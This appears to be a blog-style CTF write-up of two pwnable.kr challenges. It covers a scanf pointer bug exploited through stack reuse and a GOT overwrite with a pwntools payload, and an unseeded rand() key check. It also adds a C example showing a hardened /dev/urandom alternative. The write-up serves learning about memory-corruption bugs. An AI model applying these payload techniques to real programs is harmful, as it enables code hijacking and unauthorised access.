lpc's pwnable.kr diary (2)

[passcode]

#include <stdio.h>
#include <stdlib.h>

void login(){
    int passcode1;
    int passcode2;

    printf("enter passcode1 : ");
    scanf("%d", passcode1);   // missing &: the uninitialised value of passcode1 is used as the destination pointer
    fflush(stdin);

    // ha! mommy told me that 32bit is vulnerable to bruteforcing :)
    printf("enter passcode2 : ");
    scanf("%d", passcode2);   // same bug: passcode2's stack contents are used as the pointer

    printf("checking...\n");
    if(passcode1==338150 && passcode2==13371337){
        printf("Login OK!\n");
        system("/bin/cat flag");
    }
    else{
        printf("Login Failed!\n");
        exit(0);
    }
}

void welcome(){
    char name[100];           // lives in welcome()'s frame; after return these bytes remain on the stack where login()'s locals are placed
    printf("enter you name : ");
    scanf("%100s", name);
    printf("Welcome %s!\n", name);
}

int main(){
    printf("Toddler's Secure Login System 1.0 beta.\n");

    welcome();
    login();

    // something after login...
    printf("Now I can safely trust you that you have credential :)\n");
    return 0;
}

This challenge mainly involves two points:

1. When scanf is called without the address-of operator, and the argument that follows is therefore not an address, scanf takes the 4 bytes that variable occupies on the stack and uses them as the address it writes to.

2. GOT overwrite. This article by an expert already explains GOT overwriting clearly: https://blog.csdn.net/smalosnail/article/details/53247502

For background on the GOT itself, see this expert's blog:

https://blog.csdn.net/linyt/article/details/51635768

The idea for solving it: write the GOT entry address of some function onto the stack so that it becomes the address scanf writes to; what gets written there is the address of system, so that when that function is next called, system is invoked instead.

payload:

passcode@prowl:~$ python -c "from pwn import *;payload = 'A' * 96 + p32(0x0804a000) + str(0x80485e3);print(payload)" | ./passcode

Toddler's Secure Login System 1.0 beta.
enter you name : Welcome AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA!
Sorry mom.. I got confused about scanf usage :(
enter passcode1 : Now I can safely trust you that you have credential :)

[random]

#include <stdio.h>
#include <stdlib.h>   // rand(), system()

int main(){
    unsigned int random;
    random = rand(); // random value! (no srand() anywhere, so this is the same value on every run)

    unsigned int key=0;
    scanf("%d", &key);

    if( (key ^ random) == 0xdeadbeef ){
        printf("Good!\n");
        system("/bin/cat flag");
        return 0;
    }

    printf("Wrong, maybe you should try 2^32 cases.\n");
    return 0;
}

Key to the solution: the pseudo-random generator rand() is never seeded, so it returns the same value on every run.

random@prowl:~$ ./random
3039230856
Good!
Mommy, I thought libc random is unpredictable…
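As an added illustration (not the challenge's code), this C program shows why the unseeded rand() in random.c can be reproduced by anyone, and what taking the secret from the kernel instead looks like. It assumes a POSIX system with /dev/urandom; on glibc the first unseeded rand() is 1804289383, which XORed with 0xdeadbeef gives the 3039230856 typed in above.

```c
#include <stdio.h>
#include <stdlib.h>

/* Constructed example, not random.c itself. */

/* Same call the challenge makes: rand() with no srand() beforehand.
 * Must be the first rand() call in the process to mirror the challenge. */
unsigned int unseeded_rand(void)
{
    return (unsigned int)rand();
}

/* C11 7.22.2.2: a program that never calls srand() behaves as if srand(1)
 * had been called, so reseeding with 1 replays exactly the same value.
 * That is the whole weakness: the "random" value is a fixed constant. */
unsigned int replay_rand(void)
{
    srand(1);
    return (unsigned int)rand();
}

/* Hardened alternative: draw the secret from the kernel CSPRNG instead of
 * libc's deterministic generator. Returns 1 on success, 0 on failure; the
 * caller must refuse to continue with an uninitialised secret. */
int secure_secret(unsigned int *out)
{
    FILE *f = fopen("/dev/urandom", "rb");
    if (f == NULL)
        return 0;
    size_t n = fread(out, sizeof *out, 1, f);
    fclose(f);
    return n == 1;
}

int main(void)
{
    unsigned int a = unseeded_rand();
    unsigned int b = replay_rand();
    printf("unseeded rand() = %u, after srand(1) = %u, equal: %s\n",
           a, b, a == b ? "yes" : "no");

    unsigned int s;
    if (secure_secret(&s))
        printf("kernel-sourced secret = %u\n", s);
    else
        fprintf(stderr, "could not read /dev/urandom\n");
    return 0;
}
```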
